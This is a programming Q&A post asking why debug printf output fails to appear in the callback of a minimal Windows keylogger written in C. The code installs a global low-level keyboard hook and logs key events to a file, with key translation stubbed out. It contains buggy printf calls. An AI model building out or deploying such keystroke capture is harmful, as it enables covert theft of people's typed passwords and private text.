# Std-Output within callback-function-call does not apear

Tags: c, callback, keylogger

I am trying to write a minimal version of a keylogger for windows.

For debugging purpose I have inserted a few printf's within the callback function. Unfortunatelly nothing appears on stdout even if flushing last.

I have posted a minimal version of the keylogger just returning 'A' for testing purpose.

Any help?

```
#define _WIN32_WINNT 0x0500

#include <Windows.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <ctype.h>

LRESULT CALLBACK LowLevelKeyboardProc(int nCode, WPARAM wParam, LPARAM lParam);
void log(char *str);
char *translate(int vk, int up);

int shift = 0, caps = 0;
FILE *fd;

int main(int argc, char *argv[]) {
    HHOOK hKeyHook;
    HWND self = GetConsoleWindow();
    ShowWindow(self, SW_SHOW);
    HINSTANCE app = GetModuleHandle(NULL);
    hKeyHook = SetWindowsHookEx(WH_KEYBOARD_LL, LowLevelKeyboardProc, app, 0);
    MSG msg;
    const char *fname = "mylog.txt";
    fd = fopen(fname, "w");

    while (GetMessage(&msg, NULL, 0, 0) > 0) {
        TranslateMessage(&msg);
        printf("after translate\n");
        fflush(stdout);
        DispatchMessage(&msg);
    }
    fflush(fd);
    fclose(fd);
    return 0;
}

LRESULT CALLBACK LowLevelKeyboardProc(int nCode, WPARAM wParam, LPARAM lParam) {
    KBDLLHOOKSTRUCT *kb=(KBDLLHOOKSTRUCT *)lParam;
    char *str="[X]";
    if (wParam == WM_KEYUP) {
        str = translate(kb->vkCode, 1);
    } else if (wParam == WM_KEYDOWN) {
        str = translate(kb->vkCode, 0);
        printf("UP=");
        printf(str);
        printf("\tVK=");
        printf(kb->vkCode);
        printf("\n");
        fflush(stdout);
    }
    if (str) {
        log(str);
    }
    return 0;
}

void log(char *str) {
    fwrite(str, 1, strlen(str), fd);
    if (strstr(str," ") || strstr(str,"[CR]")) fflush(fd);
}

char* translate(int vk, int up) {
    char *buff = "A";
    return buff;
}
```

Comment: when calling `fopen()` (and several other functions), always check the returned value to assure the operation was successful.

Comment: regarding: `if (strstr(str," ") || strstr(str,"[CR]")) fflush(fd);`  1) follow the axiom: *only one statement per line and (at most) one variable declaration per statement.*  2)  this line can cause the output to not be written to the 'fd' file.  suggest using: `fflush( fd );`  Note: in general 'fd' is used for a file descriptor number and the posted code is using a 'FILE *' so a better name would be 'fp'`